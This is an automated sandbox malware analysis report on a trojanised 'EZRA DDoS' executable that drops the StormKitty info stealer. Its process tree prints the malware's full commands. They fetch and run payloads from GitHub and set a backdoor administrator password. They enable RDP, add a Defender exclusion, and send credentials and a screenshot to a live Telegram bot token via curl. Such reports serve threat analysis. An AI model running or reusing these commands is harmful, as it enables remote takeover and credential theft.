Analysis
-
max time kernel
17s -
max time network
69s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
26/02/2025, 08:33
Static task
static1
Behavioral task
behavioral1
Sample
EZRA DDoS V1.0.exe
Resource
win10ltsc2021-20250217-en
General
-
Target
EZRA DDoS V1.0.exe
-
Size
6.9MB
-
MD5
aa5f99414dbd298bae6a72139273e6eb
-
SHA1
76730e40cda2b49bbd37e0f677afb2fee2382474
-
SHA256
e9662b2692b709414df75045603153e417768e8d64f99639cc7d318cea261660
-
SHA512
dce415cc66a581740ec99f2b5f67b8ae999683d7957feba36de8caa916405833cc48a5ce673507bc55a9726e8784f3921014aa4126e734403a88ab8938ed8b4f
-
SSDEEP
3072:uHwrxmMpvDITZg1S5O5WtjN/02GM1qRJ7CetocaCqbqjywYlnVVkf:BrMZh7dOV/t1qujsVVE
Malware Config
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000027ef0-117.dat family_stormkitty behavioral1/memory/1460-120-0x0000000000250000-0x00000000002A6000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 5 IoCs
flow pid Process 7 3228 powershell.exe 16 4272 wscript.exe 17 4272 wscript.exe 20 2320 powershell.exe 34 1268 powershell.exe -
pid Process 1976 powershell.exe 5020 powershell.exe 4660 powershell.exe 1268 powershell.exe 3228 powershell.exe 2320 powershell.exe 4596 powershell.exe 3336 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 1072 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation cscript.exe Key value queried \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ctestx.vbs wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 1460 reconstructed.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 reconstructed.exe Key opened \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 reconstructed.exe Key opened \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 reconstructed.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" EZRA DDoS V1.0.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 4 IoCs
description ioc Process File created C:\ProgramData\OVHNKVWP\FileGrabber\Downloads\desktop.ini reconstructed.exe File created C:\ProgramData\OVHNKVWP\FileGrabber\Pictures\desktop.ini reconstructed.exe File created C:\ProgramData\OVHNKVWP\FileGrabber\Desktop\desktop.ini reconstructed.exe File created C:\ProgramData\OVHNKVWP\FileGrabber\Documents\desktop.ini reconstructed.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 86 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com 16 raw.githubusercontent.com 34 raw.githubusercontent.com 81 raw.githubusercontent.com 83 raw.githubusercontent.com 84 raw.githubusercontent.com -
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ipinfo.io 20 ipinfo.io 41 freegeoip.app 42 freegeoip.app 61 api.ipify.org 62 api.ipify.org 63 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reconstructed.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 1680 timeout.exe 3280 timeout.exe 4588 timeout.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 3228 powershell.exe 3228 powershell.exe 2340 WMIC.exe 2340 WMIC.exe 2340 WMIC.exe 2340 WMIC.exe 2320 powershell.exe 2320 powershell.exe 5020 powershell.exe 5020 powershell.exe 3448 WMIC.exe 3448 WMIC.exe 3448 WMIC.exe 3448 WMIC.exe 3584 WMIC.exe 3584 WMIC.exe 3584 WMIC.exe 3584 WMIC.exe 3804 WMIC.exe 3804 WMIC.exe 3804 WMIC.exe 3804 WMIC.exe 4916 WMIC.exe 4916 WMIC.exe 4916 WMIC.exe 4916 WMIC.exe 1976 powershell.exe 1976 powershell.exe 4596 powershell.exe 4596 powershell.exe 1268 powershell.exe 1268 powershell.exe 1268 powershell.exe 4660 powershell.exe 4660 powershell.exe 3336 powershell.exe 3336 powershell.exe 3336 powershell.exe 1460 reconstructed.exe 1460 reconstructed.exe 1460 reconstructed.exe 1460 reconstructed.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3228 powershell.exe Token: SeIncreaseQuotaPrivilege 2340 WMIC.exe Token: SeSecurityPrivilege 2340 WMIC.exe Token: SeTakeOwnershipPrivilege 2340 WMIC.exe Token: SeLoadDriverPrivilege 2340 WMIC.exe Token: SeSystemProfilePrivilege 2340 WMIC.exe Token: SeSystemtimePrivilege 2340 WMIC.exe Token: SeProfSingleProcessPrivilege 2340 WMIC.exe Token: SeIncBasePriorityPrivilege 2340 WMIC.exe Token: SeCreatePagefilePrivilege 2340 WMIC.exe Token: SeBackupPrivilege 2340 WMIC.exe Token: SeRestorePrivilege 2340 WMIC.exe Token: SeShutdownPrivilege 2340 WMIC.exe Token: SeDebugPrivilege 2340 WMIC.exe Token: SeSystemEnvironmentPrivilege 2340 WMIC.exe Token: SeRemoteShutdownPrivilege 2340 WMIC.exe Token: SeUndockPrivilege 2340 WMIC.exe Token: SeManageVolumePrivilege 2340 WMIC.exe Token: 33 2340 WMIC.exe Token: 34 2340 WMIC.exe Token: 35 2340 WMIC.exe Token: 36 2340 WMIC.exe Token: SeIncreaseQuotaPrivilege 2340 WMIC.exe Token: SeSecurityPrivilege 2340 WMIC.exe Token: SeTakeOwnershipPrivilege 2340 WMIC.exe Token: SeLoadDriverPrivilege 2340 WMIC.exe Token: SeSystemProfilePrivilege 2340 WMIC.exe Token: SeSystemtimePrivilege 2340 WMIC.exe Token: SeProfSingleProcessPrivilege 2340 WMIC.exe Token: SeIncBasePriorityPrivilege 2340 WMIC.exe Token: SeCreatePagefilePrivilege 2340 WMIC.exe Token: SeBackupPrivilege 2340 WMIC.exe Token: SeRestorePrivilege 2340 WMIC.exe Token: SeShutdownPrivilege 2340 WMIC.exe Token: SeDebugPrivilege 2340 WMIC.exe Token: SeSystemEnvironmentPrivilege 2340 WMIC.exe Token: SeRemoteShutdownPrivilege 2340 WMIC.exe Token: SeUndockPrivilege 2340 WMIC.exe Token: SeManageVolumePrivilege 2340 WMIC.exe Token: 33 2340 WMIC.exe Token: 34 2340 WMIC.exe Token: 35 2340 WMIC.exe Token: 36 2340 WMIC.exe Token: SeDebugPrivilege 2320 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeIncreaseQuotaPrivilege 3448 WMIC.exe Token: SeSecurityPrivilege 3448 WMIC.exe Token: SeTakeOwnershipPrivilege 3448 WMIC.exe Token: SeLoadDriverPrivilege 3448 WMIC.exe Token: SeSystemProfilePrivilege 3448 WMIC.exe Token: SeSystemtimePrivilege 3448 WMIC.exe Token: SeProfSingleProcessPrivilege 3448 WMIC.exe Token: SeIncBasePriorityPrivilege 3448 WMIC.exe Token: SeCreatePagefilePrivilege 3448 WMIC.exe Token: SeBackupPrivilege 3448 WMIC.exe Token: SeRestorePrivilege 3448 WMIC.exe Token: SeShutdownPrivilege 3448 WMIC.exe Token: SeDebugPrivilege 3448 WMIC.exe Token: SeSystemEnvironmentPrivilege 3448 WMIC.exe Token: SeRemoteShutdownPrivilege 3448 WMIC.exe Token: SeUndockPrivilege 3448 WMIC.exe Token: SeManageVolumePrivilege 3448 WMIC.exe Token: 33 3448 WMIC.exe Token: 34 3448 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2256 wrote to memory of 1372 2256 EZRA DDoS V1.0.exe 84 PID 2256 wrote to memory of 1372 2256 EZRA DDoS V1.0.exe 84 PID 1372 wrote to memory of 3228 1372 cmd.exe 86 PID 1372 wrote to memory of 3228 1372 cmd.exe 86 PID 1372 wrote to memory of 4908 1372 cmd.exe 87 PID 1372 wrote to memory of 4908 1372 cmd.exe 87 PID 4908 wrote to memory of 4272 4908 cscript.exe 88 PID 4908 wrote to memory of 4272 4908 cscript.exe 88 PID 1372 wrote to memory of 1680 1372 cmd.exe 89 PID 1372 wrote to memory of 1680 1372 cmd.exe 89 PID 1372 wrote to memory of 2100 1372 cmd.exe 92 PID 1372 wrote to memory of 2100 1372 cmd.exe 92 PID 2100 wrote to memory of 2340 2100 cmd.exe 93 PID 2100 wrote to memory of 2340 2100 cmd.exe 93 PID 4272 wrote to memory of 3220 4272 wscript.exe 97 PID 4272 wrote to memory of 3220 4272 wscript.exe 97 PID 3220 wrote to memory of 2664 3220 cmd.exe 99 PID 3220 wrote to memory of 2664 3220 cmd.exe 99 PID 3220 wrote to memory of 5096 3220 cmd.exe 100 PID 3220 wrote to memory of 5096 3220 cmd.exe 100 PID 5096 wrote to memory of 3588 5096 net.exe 101 PID 5096 wrote to memory of 3588 5096 net.exe 101 PID 3220 wrote to memory of 2440 3220 cmd.exe 102 PID 3220 wrote to memory of 2440 3220 cmd.exe 102 PID 3220 wrote to memory of 1072 3220 cmd.exe 103 PID 3220 wrote to memory of 1072 3220 cmd.exe 103 PID 3220 wrote to memory of 1684 3220 cmd.exe 104 PID 3220 wrote to memory of 1684 3220 cmd.exe 104 PID 1684 wrote to memory of 2320 1684 cmd.exe 105 PID 1684 wrote to memory of 2320 1684 cmd.exe 105 PID 3220 wrote to memory of 3928 3220 cmd.exe 106 PID 3220 wrote to memory of 3928 3220 cmd.exe 106 PID 3928 wrote to memory of 5020 3928 cmd.exe 107 PID 3928 wrote to memory of 5020 3928 cmd.exe 107 PID 3220 wrote to memory of 4396 3220 cmd.exe 108 PID 3220 wrote to memory of 4396 3220 cmd.exe 108 PID 4396 wrote to memory of 3448 4396 cmd.exe 109 PID 4396 wrote to memory of 3448 4396 cmd.exe 109 PID 3220 wrote to memory of 1412 3220 cmd.exe 111 PID 3220 wrote to memory of 1412 3220 cmd.exe 111 PID 1412 wrote to memory of 3584 1412 cmd.exe 112 PID 1412 wrote to memory of 3584 1412 cmd.exe 112 PID 3220 wrote to memory of 1828 3220 cmd.exe 113 PID 3220 wrote to memory of 1828 3220 cmd.exe 113 PID 1828 wrote to memory of 3804 1828 cmd.exe 114 PID 1828 wrote to memory of 3804 1828 cmd.exe 114 PID 3220 wrote to memory of 4248 3220 cmd.exe 115 PID 3220 wrote to memory of 4248 3220 cmd.exe 115 PID 4248 wrote to memory of 4916 4248 cmd.exe 116 PID 4248 wrote to memory of 4916 4248 cmd.exe 116 PID 3220 wrote to memory of 228 3220 cmd.exe 117 PID 3220 wrote to memory of 228 3220 cmd.exe 117 PID 3220 wrote to memory of 1976 3220 cmd.exe 118 PID 3220 wrote to memory of 1976 3220 cmd.exe 118 PID 3220 wrote to memory of 3552 3220 cmd.exe 119 PID 3220 wrote to memory of 3552 3220 cmd.exe 119 PID 3220 wrote to memory of 4596 3220 cmd.exe 120 PID 3220 wrote to memory of 4596 3220 cmd.exe 120 PID 3220 wrote to memory of 1268 3220 cmd.exe 124 PID 3220 wrote to memory of 1268 3220 cmd.exe 124 PID 3220 wrote to memory of 4660 3220 cmd.exe 125 PID 3220 wrote to memory of 4660 3220 cmd.exe 125 PID 3220 wrote to memory of 3336 3220 cmd.exe 126 PID 3220 wrote to memory of 3336 3220 cmd.exe 126 -
cURL User-Agent 2 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 23 curl/8.7.1 HTTP User-Agent header 29 curl/8.7.1 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 reconstructed.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3452737631-513087862-588053281-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 reconstructed.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\EZRA DDoS V1.0.exe"C:\Users\Admin\AppData\Local\Temp\EZRA DDoS V1.0.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SYSTEM32\cmd.execmd /c tls.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/ctestx.txt' -OutFile 'C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.txt'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\system32\cscript.execscript //nologo "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.vbs" /elevated4⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\decoded.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"6⤵PID:2664
-
-
C:\Windows\system32\net.exenet user Administrator P@ssw0rdXlazy#6⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Administrator P@ssw0rdXlazy#7⤵PID:3588
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f6⤵PID:2440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "Invoke-WebRequest -Uri 'https://ipinfo.io/json' -UseBasicParsing | ConvertFrom-Json | ForEach-Object { $_.ip + ',' + $_.country }"6⤵
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri 'https://ipinfo.io/json' -UseBasicParsing | ConvertFrom-Json | ForEach-Object { $_.ip + ',' + $_.country }"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "(Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'PortNumber').PortNumber"6⤵
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'PortNumber').PortNumber"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value6⤵
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption /value7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get Name /value6⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get Name /value7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic computersystem get NumberOfLogicalProcessors /value6⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get NumberOfLogicalProcessors /value7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value6⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\System32\Wbem\WMIC.exewmic os get TotalVisibleMemorySize /value7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4916
-
-
-
C:\Windows\system32\curl.execurl -s -X POST "https://api.telegram.org/bot7576409440:AAEhYc3BvwzU4FAC7xC6Sc9znSW9OBEtiNs/sendMessage" -d "chat_id=-1002449605159" -d "text=<b>HIT Detected :) </b><b> ====[HIT INFO]====</b><b> [+] System =></b> Microsoft Windows 10 Enterprise LTSC <b> [+] RAM =></b> 3 GB<b> [+] Processor =></b> Intel Core Processor (Broadwell) <b> [+] Cores =></b> 2 <b> [+] IP =></b> 212.102.63.147<b> [+] Port =></b> 3389<b> [+] Country =></b> GB<b> [+] User =></b> Administrator<b> [+] Password =></b> P@ssw0rdXlazy#<b> [+] Date =></b> Wed 02/26/2025 8:38 %am_pm" -d "parse_mode=html"6⤵PID:228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap = New-Object System.Drawing.Bitmap($screen.Width, $screen.Height); $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size); $bitmap.Save('C:\Users\Admin\Desktop\screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png); $graphics.Dispose(); $bitmap.Dispose()6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1976
-
-
C:\Windows\system32\curl.execurl -s -X POST "https://api.telegram.org/bot7576409440:AAEhYc3BvwzU4FAC7xC6Sc9znSW9OBEtiNs/sendPhoto" -F "chat_id=-1002449605159" -F "photo=@C:\Users\Admin\Desktop\screenshot.png"6⤵PID:3552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { Add-MpPreference -ExclusionPath 'C:\Users\Admin\Documents'; Write-Host 'Access Granted' -ForegroundColor Green } catch { Write-Host 'Failed to Grant Access (Possibly, Try to disable your antivirus) ' -ForegroundColor Red; exit 1 }"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/encrypt.txt' -UseBasicParsing -OutFile 'C:\Users\Admin\Documents\encrypt.txt'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$encryptedDataBase64 = Get-Content 'C:\Users\Admin\Documents\encrypt.txt' -Raw; $encryptedData = [Convert]::FromBase64String($encryptedDataBase64); $decryptedData = $encryptedData | ForEach-Object { $_ -bxor 123 }; [System.IO.File]::WriteAllBytes('C:\Users\Admin\Documents\reconstructed.exe', $decryptedData)"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -FilePath 'C:\Users\Admin\Documents\reconstructed.exe' -Verb RunAs -WindowStyle Hidden"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3336 -
C:\Users\Admin\Documents\reconstructed.exe"C:\Users\Admin\Documents\reconstructed.exe"7⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:1460
-
-
-
-
-
-
C:\Windows\system32\timeout.exetimeout /t 23⤵
- Delays execution with timeout.exe
PID:1680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get UUID /value3⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get UUID /value4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c python -c "import hashlib; print(hashlib.sha256(f'VALID-UNKNOWN-DEVICE'.encode()).hexdigest()[:16].upper())"3⤵PID:4236
-
-
C:\Windows\system32\timeout.exetimeout /t 23⤵
- Delays execution with timeout.exe
PID:3280
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\main.py" "https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/main.py" --silent3⤵PID:1140
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\setup.py" "https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/setup.py" --silent3⤵PID:2544
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\resources\ua.txt" "https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/ua.txt" --silent3⤵PID:3336
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\requirements.txt" "https://raw.githubusercontent.com/spooffewfe/yff/refs/heads/main/requirements.txt" --silent3⤵PID:3596
-
-
C:\Windows\system32\timeout.exetimeout /t 23⤵
- Delays execution with timeout.exe
PID:4588
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
105B
MD52e9d094dda5cdc3ce6519f75943a4ff4
SHA15d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7
-
Filesize
4KB
MD5f262505f91a5656e96d0d4bf5edab77d
SHA1153ae926257ed1a6cdfdd8ff7e993cb3b4595267
SHA2568db4ba23a8f11c36aa636dcb4dfe2fc8cda3d3b6361e6f1a4e3fbf910db142ed
SHA512eb22f33c4b78a86d849d0e2e04580ec86fdd3ab8100377dedadaee9d3c9c61d22139c6d60d7711638135fe2071a5b52371110b6c19d6ba03774fe45a350ce702
-
Filesize
199KB
MD5a9f53b6f50f86c67855ed64408fca134
SHA1f953a758964d9e4f6de72e9e02ebd402fd362333
SHA256800d34d5fae11e54ccac9974764cdec33b9340d01c9f68eb24e73ffa628cf17e
SHA51241fbcf3f88b1c123d3293deefef57d3e351c7dc5d6049996df30b925afd2f02aada5e6e76db898c836e1f9ae069305118682fca3bbba1524bb50b07bb204ab3e
-
Filesize
2KB
MD5ed30ca9187bf5593affb3dc9276309a6
SHA1c63757897a6c43a44102b221fe8dc36355e99359
SHA25681fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA5121df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize
1KB
MD5ddbce69b410e4819cf63c2d78cef1efc
SHA191844be6fdd8a3f07c78437799ccae931258605f
SHA256648bc93a7aef845cfad6ea718bc6c46055f963bcd1687c5471530f0546413911
SHA5123b33e1cec7863cf4701081d95334f6a8c5b819fae4204e2e121442ad69b558ce1039bee9a9f998942a74830e90109268e526c56f40f7a503814c924983728c8a
-
Filesize
1KB
MD53f018cbf76183042f3a4b189d6bbe097
SHA1143959de8431321c4af1793bd59bb193490aa2b3
SHA2568dcf6ec6ee6ff8e10352fcb3e09f3ead89d9200f1660e6a969097f3483afb47e
SHA5123a6ed260751fed9f2ddba0bb20e767ec0e61665b55eddfe8d00834f7c36b061fc17271bebc9650a75260627deadad4813e013d3d5aaee4aaa6453603aff99d50
-
Filesize
1KB
MD5670c4920a79e1c12a6c4e8ff4007562b
SHA15023e825d4a8af071498411f589f3b25ff335f0f
SHA25637c4a07c009ffa6061e7ffcec01d0eb2c1a2c7ac94fc3d2208e1bfee6815c92f
SHA512d717acfd4aea4d2788b06be081c00d97929eadaa97b9144ebc02617837d8c9ffaad30f3bef0a662c560dc2bc98603853af3404120f5ac2430335dda06e7c5bd5
-
Filesize
1KB
MD53a2d88c6bee0c833a6ce16080f56716c
SHA1427a054d09fcb56678762104b3832eb863c3e5d0
SHA256f7872c51a82990f14e645c096ed957cf440db93bae672ce559cd264373567270
SHA51270cdc5a1581ca1cf0bd7803358ef98e157e090367421d7657fb900044dbcc1d5e85f3deef8ba10de052e892cdf94438dcb8f16bbfbec198f303ea7e31aeb375a
-
Filesize
64B
MD5181cb065c38e7e8c523bf7d2d4e36a79
SHA1daf463490aac6e133bc7548183ecdb265e6dddae
SHA256c20e593d7ac65f8037bb38d64b4763389c8a944c86a132973329b598ea54849a
SHA5123794f53e7f9058fab6b1384ec68673cbbed452628c8300ae57a1ecd4e29a2c0dbdf3759e08f63cfe4d68258cc06251493d15cec19d798110aa6bbaf461b96202
-
Filesize
1KB
MD555f5b4415d056cd9177df5288d1c99db
SHA17036f03ef0e0c0590906ed4acd74cd198db3126d
SHA2569db798502d2ff02f27439cd07aa0504fe63578b7d6a11293204e1a5913aae58b
SHA512001c61170f776377b65b44d90bfbe580aee20d103770191fab1c6afc9b769797ec9155fa50de47846affc4e5ecdffb9ffcffbebf8f11bb724c6470491ceeea16
-
Filesize
1KB
MD5631d56c677a80b2571c4f6cd4de7aab8
SHA162e6a6c12af2646395ca66be0020b6eb78f21180
SHA2565f629f10b8b415abe65a443c7930cc8acba0af1bc11f507552d000758c87def6
SHA512ad398c209373bf500a2446753d75b84186717ec911d16929b24d7aa76393b0ae3843d854e19bc9b7677663ebda5f803d0988d5151b8bedc3f1dca574a9cdb517
-
Filesize
2KB
MD5ad24940eb1f75d4f04ebaf6812657fb5
SHA1f0ee8bb82e11a0c997b044c6d2887ec4cb8d7f93
SHA256c330aaaf72fc0cfcc57c281120543318e509c388c989f7f1e3c5be56851ecbf5
